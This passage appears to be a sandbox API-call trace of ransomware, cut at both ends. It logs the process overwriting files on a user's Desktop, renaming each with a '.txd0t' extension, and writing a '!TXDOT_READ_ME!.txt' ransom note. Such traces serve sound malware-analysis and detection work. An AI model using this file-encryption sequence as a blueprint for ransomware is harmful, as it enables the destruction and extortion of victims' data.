lpNumberOfBytesRead=0x4a9f700, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesRead=0x4a9f700*=0xdbb0, lpOverlapped=0x0) returned 1 [0073.653] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xffff2450, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.653] WriteFile (in: hFile=0x468, lpBuffer=0x415b020*, nNumberOfBytesToWrite=0xdbb0, lpNumberOfBytesWritten=0x4a9f704, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesWritten=0x4a9f704*=0xdbb0, lpOverlapped=0x0) returned 1 [0073.653] FlushFileBuffers (hFile=0x468) returned 1 [0073.666] GetProcessHeap () returned 0xe30000 [0073.666] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x116) returned 0xed1c70 [0073.666] StrCpyW (in: psz1=0xed1c70, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\3dId0lsBJQweABTLa.bmp" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\3dId0lsBJQweABTLa.bmp") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\3dId0lsBJQweABTLa.bmp" [0073.666] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\3dId0lsBJQweABTLa.bmp") returned="3dId0lsBJQweABTLa.bmp" [0073.667] StrCpyW (in: psz1=0xed1cb4, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0073.667] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\!TXDOT_READ_ME!.txt") returned 0 [0073.667] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\!TXDOT_READ_ME!.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\t2ura\\!txdot_read_me!.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x46c [0073.668] WriteFile (in: hFile=0x46c, lpBuffer=0x4a9f734*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x4a9f730, lpOverlapped=0x0 | out: lpBuffer=0x4a9f734*, lpNumberOfBytesWritten=0x4a9f730*=0x2, lpOverlapped=0x0) returned 1 [0073.670] FlushFileBuffers (hFile=0x46c) returned 1 [0073.732] WriteFile (in: hFile=0x46c, lpBuffer=0x84d840*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x4a9f730, lpOverlapped=0x0 | out: lpBuffer=0x84d840*, lpNumberOfBytesWritten=0x4a9f730*=0x7f0, lpOverlapped=0x0) returned 1 [0073.734] FlushFileBuffers (hFile=0x46c) returned 1 [0073.740] CloseHandle (hObject=0x46c) returned 1 [0073.740] GetProcessHeap () returned 0xe30000 [0073.740] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed1c70 | out: hHeap=0xe30000) returned 1 [0073.740] CloseHandle (hObject=0x468) returned 1 [0073.741] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\3dId0lsBJQweABTLa.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\t2ura\\3did0lsbjqweabtla.bmp"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\3dId0lsBJQweABTLa.bmp.txd0t" (normalized: "c:\\users\\fd1hvy\\desktop\\t2ura\\3did0lsbjqweabtla.bmp.txd0t")) returned 1 [0073.742] SetEvent (hEvent=0x40c) returned 1 [0073.742] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x0 [0073.747] StrCpyW (in: psz1=0x4a9f740, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\Eiu0lN-XaE.docx" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\Eiu0lN-XaE.docx") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\Eiu0lN-XaE.docx" [0073.748] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\Eiu0lN-XaE.docx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\Eiu0lN-XaE.docx.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\Eiu0lN-XaE.docx.txd0t" [0073.748] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\Eiu0lN-XaE.docx.txd0t") returned 0 [0073.748] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\Eiu0lN-XaE.docx", dwFileAttributes=0x80) returned 1 [0073.748] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\Eiu0lN-XaE.docx" (normalized: "c:\\users\\fd1hvy\\desktop\\t2ura\\eiu0ln-xae.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x46c [0073.748] GetFileSizeEx (in: hFile=0x46c, lpFileSize=0x4a9fcec | out: lpFileSize=0x4a9fcec*=12696) returned 1 [0073.748] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0073.748] WriteFile (in: hFile=0x46c, lpBuffer=0x4a9f9d0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4a9fce8, lpOverlapped=0x0 | out: lpBuffer=0x4a9f9d0*, lpNumberOfBytesWritten=0x4a9fce8*=0x200, lpOverlapped=0x0) returned 1 [0073.748] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xffffcc68, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.749] ReadFile (in: hFile=0x46c, lpBuffer=0x415b020, nNumberOfBytesToRead=0x3190, lpNumberOfBytesRead=0x4a9f700, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesRead=0x4a9f700*=0x3190, lpOverlapped=0x0) returned 1 [0073.749] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xffffce70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.749] WriteFile (in: hFile=0x46c, lpBuffer=0x415b020*, nNumberOfBytesToWrite=0x3190, lpNumberOfBytesWritten=0x4a9f704, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesWritten=0x4a9f704*=0x3190, lpOverlapped=0x0) returned 1 [0073.749] FlushFileBuffers (hFile=0x46c) returned 1 [0073.754] GetProcessHeap () returned 0xe30000 [0073.754] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x10a) returned 0xed2f30 [0073.754] StrCpyW (in: psz1=0xed2f30, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\Eiu0lN-XaE.docx" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\Eiu0lN-XaE.docx") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\Eiu0lN-XaE.docx" [0073.754] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\Eiu0lN-XaE.docx") returned="Eiu0lN-XaE.docx" [0073.754] StrCpyW (in: psz1=0xed2f74, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0073.754] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\!TXDOT_READ_ME!.txt") returned 1 [0073.755] GetProcessHeap () returned 0xe30000 [0073.755] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed2f30 | out: hHeap=0xe30000) returned 1 [0073.755] CloseHandle (hObject=0x46c) returned 1 [0073.756] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\Eiu0lN-XaE.docx" (normalized: "c:\\users\\fd1hvy\\desktop\\t2ura\\eiu0ln-xae.docx"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\Eiu0lN-XaE.docx.txd0t" (normalized: "c:\\users\\fd1hvy\\desktop\\t2ura\\eiu0ln-xae.docx.txd0t")) returned 1 [0073.756] SetEvent (hEvent=0x40c) returned 1 [0073.756] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x0 [0073.767] StrCpyW (in: psz1=0x4a9f740, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\OCsemDUOtc.swf" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\OCsemDUOtc.swf") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\OCsemDUOtc.swf" [0073.767] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\OCsemDUOtc.swf", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\OCsemDUOtc.swf.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\OCsemDUOtc.swf.txd0t" [0073.767] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\OCsemDUOtc.swf.txd0t") returned 0 [0073.767] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\OCsemDUOtc.swf", dwFileAttributes=0x80) returned 1 [0073.767] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\OCsemDUOtc.swf" (normalized: "c:\\users\\fd1hvy\\desktop\\t2ura\\ocsemduotc.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x468 [0073.768] GetFileSizeEx (in: hFile=0x468, lpFileSize=0x4a9fcec | out: lpFileSize=0x4a9fcec*=36696) returned 1 [0073.768] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0073.768] WriteFile (in: hFile=0x468, lpBuffer=0x4a9f9d0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4a9fce8, lpOverlapped=0x0 | out: lpBuffer=0x4a9f9d0*, lpNumberOfBytesWritten=0x4a9fce8*=0x200, lpOverlapped=0x0) returned 1 [0073.769] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xffff6ea8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.769] ReadFile (in: hFile=0x468, lpBuffer=0x415b020, nNumberOfBytesToRead=0x8f50, lpNumberOfBytesRead=0x4a9f700, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesRead=0x4a9f700*=0x8f50, lpOverlapped=0x0) returned 1 [0073.769] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xffff70b0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.770] WriteFile (in: hFile=0x468, lpBuffer=0x415b020*, nNumberOfBytesToWrite=0x8f50, lpNumberOfBytesWritten=0x4a9f704, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesWritten=0x4a9f704*=0x8f50, lpOverlapped=0x0) returned 1 [0073.770] FlushFileBuffers (hFile=0x468) returned 1 [0073.776] GetProcessHeap () returned 0xe30000 [0073.776] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x108) returned 0xe9d750 [0073.776] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\OCsemDUOtc.swf" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\OCsemDUOtc.swf") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\OCsemDUOtc.swf" [0073.776] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\OCsemDUOtc.swf") returned="OCsemDUOtc.swf" [0073.776] StrCpyW (in: psz1=0xe9d794, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0073.776] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\!TXDOT_READ_ME!.txt") returned 1 [0073.776] GetProcessHeap () returned 0xe30000 [0073.776] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0073.776] CloseHandle (hObject=0x468) returned 1 [0073.778] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\OCsemDUOtc.swf" (normalized: "c:\\users\\fd1hvy\\desktop\\t2ura\\ocsemduotc.swf"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\OCsemDUOtc.swf.txd0t" (normalized: "c:\\users\\fd1hvy\\desktop\\t2ura\\ocsemduotc.swf.txd0t")) returned 1 [0073.778] SetEvent (hEvent=0x40c) returned 1 [0073.778] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x0 [0073.783] StrCpyW (in: psz1=0x4a9f740, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\Rud6mibY589Ee3.mkv" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\Rud6mibY589Ee3.mkv") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\Rud6mibY589Ee3.mkv" [0073.783] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\Rud6mibY589Ee3.mkv", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\Rud6mibY589Ee3.mkv.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\Rud6mibY589Ee3.mkv.txd0t" [0073.783] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\Rud6mibY589Ee3.mkv.txd0t") returned 0 [0073.784] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\Rud6mibY589Ee3.mkv", dwFileAttributes=0x80) returned 1 [0073.784] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\Rud6mibY589Ee3.mkv" (normalized: "c:\\users\\fd1hvy\\desktop\\t2ura\\rud6miby589ee3.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x46c [0073.784] GetFileSizeEx (in: hFile=0x46c, lpFileSize=0x4a9fcec | out: lpFileSize=0x4a9fcec*=39725) returned 1 [0073.784] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0073.784] WriteFile (in: hFile=0x46c, lpBuffer=0x4a9f9d0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4a9fce8, lpOverlapped=0x0 | out: lpBuffer=0x4a9f9d0*, lpNumberOfBytesWritten=0x4a9fce8*=0x200, lpOverlapped=0x0) returned 1 [0073.785] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xffff62d3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.785] ReadFile (in: hFile=0x46c, lpBuffer=0x415b020, nNumberOfBytesToRead=0x9b20, lpNumberOfBytesRead=0x4a9f700, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesRead=0x4a9f700*=0x9b20, lpOverlapped=0x0) returned 1 [0073.786] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xffff64e0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.786] WriteFile (in: hFile=0x46c, lpBuffer=0x415b020*, nNumberOfBytesToWrite=0x9b20, lpNumberOfBytesWritten=0x4a9f704, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesWritten=0x4a9f704*=0x9b20, lpOverlapped=0x0) returned 1 [0073.786] FlushFileBuffers (hFile=0x46c) returned 1 [0073.796] GetProcessHeap () returned 0xe30000 [0073.796] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x110) returned 0xed2670 [0073.796] StrCpyW (in: psz1=0xed2670, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\Rud6mibY589Ee3.mkv" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\Rud6mibY589Ee3.mkv") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\Rud6mibY589Ee3.mkv" [0073.796] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\Rud6mibY589Ee3.mkv") returned="Rud6mibY589Ee3.mkv" [0073.796] StrCpyW (in: psz1=0xed26b4, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0073.796] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\!TXDOT_READ_ME!.txt") returned 1 [0073.796] GetProcessHeap () returned 0xe30000 [0073.796] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed2670 | out: hHeap=0xe30000) returned 1 [0073.796] CloseHandle (hObject=0x46c) returned 1 [0073.798] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\Rud6mibY589Ee3.mkv" (normalized: "c:\\users\\fd1hvy\\desktop\\t2ura\\rud6miby589ee3.mkv"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\Rud6mibY589Ee3.mkv.txd0t" (normalized: "c:\\users\\fd1hvy\\desktop\\t2ura\\rud6miby589ee3.mkv.txd0t")) returned 1 [0073.798] SetEvent (hEvent=0x40c) returned 1 [0073.798] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x0 [0073.803] StrCpyW (in: psz1=0x4a9f740, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\xs8aVnsK9NnWwoql.png" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\xs8aVnsK9NnWwoql.png") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\xs8aVnsK9NnWwoql.png" [0073.803] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\xs8aVnsK9NnWwoql.png", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\xs8aVnsK9NnWwoql.png.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\xs8aVnsK9NnWwoql.png.txd0t" [0073.803] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\xs8aVnsK9NnWwoql.png.txd0t") returned 0 [0073.803] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\xs8aVnsK9NnWwoql.png", dwFileAttributes=0x80) returned 1 [0073.803] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\xs8aVnsK9NnWwoql.png" (normalized: "c:\\users\\fd1hvy\\desktop\\t2ura\\xs8avnsk9nnwwoql.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x468 [0073.804] GetFileSizeEx (in: hFile=0x468, lpFileSize=0x4a9fcec | out: lpFileSize=0x4a9fcec*=43249) returned 1 [0073.804] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0073.804] WriteFile (in: hFile=0x468, lpBuffer=0x4a9f9d0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4a9fce8, lpOverlapped=0x0 | out: lpBuffer=0x4a9f9d0*, lpNumberOfBytesWritten=0x4a9fce8*=0x200, lpOverlapped=0x0) returned 1 [0073.804] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xffff550f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.805] ReadFile (in: hFile=0x468, lpBuffer=0x415b020, nNumberOfBytesToRead=0xa8f0, lpNumberOfBytesRead=0x4a9f700, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesRead=0x4a9f700*=0xa8f0, lpOverlapped=0x0) returned 1 [0073.805] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xffff5710, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.805] WriteFile (in: hFile=0x468, lpBuffer=0x415b020*, nNumberOfBytesToWrite=0xa8f0, lpNumberOfBytesWritten=0x4a9f704, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesWritten=0x4a9f704*=0xa8f0, lpOverlapped=0x0) returned 1 [0073.806] FlushFileBuffers (hFile=0x468) returned 1 [0073.812] GetProcessHeap () returned 0xe30000 [0073.812] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x114) returned 0xed1d98 [0073.812] StrCpyW (in: psz1=0xed1d98, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\xs8aVnsK9NnWwoql.png" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\xs8aVnsK9NnWwoql.png") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\xs8aVnsK9NnWwoql.png" [0073.812] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\xs8aVnsK9NnWwoql.png") returned="xs8aVnsK9NnWwoql.png" [0073.812] StrCpyW (in: psz1=0xed1ddc, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0073.812] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\!TXDOT_READ_ME!.txt") returned 1 [0073.812] GetProcessHeap () returned 0xe30000 [0073.812] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed1d98 | out: hHeap=0xe30000) returned 1 [0073.812] CloseHandle (hObject=0x468) returned 1 [0073.814] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\xs8aVnsK9NnWwoql.png" (normalized: "c:\\users\\fd1hvy\\desktop\\t2ura\\xs8avnsk9nnwwoql.png"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\xs8aVnsK9NnWwoql.png.txd0t" (normalized: "c:\\users\\fd1hvy\\desktop\\t2ura\\xs8avnsk9nnwwoql.png.txd0t")) returned 1 [0073.814] SetEvent (hEvent=0x40c) returned 1 [0073.814] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x0 [0073.820] StrCpyW (in: psz1=0x4a9f750, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\yKYlr_viA.odt" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\yKYlr_viA.odt") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\yKYlr_viA.odt" [0073.820] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\yKYlr_viA.odt", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\yKYlr_viA.odt.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\yKYlr_viA.odt.txd0t" [0073.820] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\yKYlr_viA.odt.txd0t") returned 0 [0073.820] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\yKYlr_viA.odt", dwFileAttributes=0x80) returned 1 [0073.820] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\yKYlr_viA.odt" (normalized: "c:\\users\\fd1hvy\\desktop\\t2ura\\ykylr_via.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x46c [0073.820] GetFileSizeEx (in: hFile=0x46c, lpFileSize=0x4a9fcec | out: lpFileSize=0x4a9fcec*=83532) returned 1 [0073.820] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0073.820] WriteFile (in: hFile=0x46c, lpBuffer=0x4a9f9d0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4a9fce8, lpOverlapped=0x0 | out: lpBuffer=0x4a9f9d0*, lpNumberOfBytesWritten=0x4a9fce8*=0x200, lpOverlapped=0x0) returned 1 [0073.821] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xfffeb7b4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.821] ReadFile (in: hFile=0x46c, lpBuffer=0x415b020, nNumberOfBytesToRead=0x14640, lpNumberOfBytesRead=0x4a9f710, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesRead=0x4a9f710*=0x14640, lpOverlapped=0x0) returned 1 [0073.823] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xfffeb9c0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.823] WriteFile (in: hFile=0x46c, lpBuffer=0x415b020*, nNumberOfBytesToWrite=0x14640, lpNumberOfBytesWritten=0x4a9f714, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesWritten=0x4a9f714*=0x14640, lpOverlapped=0x0) returned 1 [0073.823] FlushFileBuffers (hFile=0x46c) returned 1 [0073.832] GetProcessHeap () returned 0xe30000 [0073.832] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x106) returned 0xe9d750 [0073.833] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\yKYlr_viA.odt" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\yKYlr_viA.odt") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\yKYlr_viA.odt" [0073.833] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\yKYlr_viA.odt") returned="yKYlr_viA.odt" [0073.833] StrCpyW (in: psz1=0xe9d794, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0073.833] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\!TXDOT_READ_ME!.txt") returned 1 [0073.833] GetProcessHeap () returned 0xe30000 [0073.833] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0073.833] CloseHandle (hObject=0x46c) returned 1 [0073.836] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\yKYlr_viA.odt" (normalized: "c:\\users\\fd1hvy\\desktop\\t2ura\\ykylr_via.odt"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\yKYlr_viA.odt.txd0t" (normalized: "c:\\users\\fd1hvy\\desktop\\t2ura\\ykylr_via.odt.txd0t")) returned 1 [0073.836] SetEvent (hEvent=0x40c) returned 1 [0073.836] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x0 [0073.838] StrCpyW (in: psz1=0x4a9f740, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\TLtL7FqQ6HKzRKYgMVx.mp3" | out: 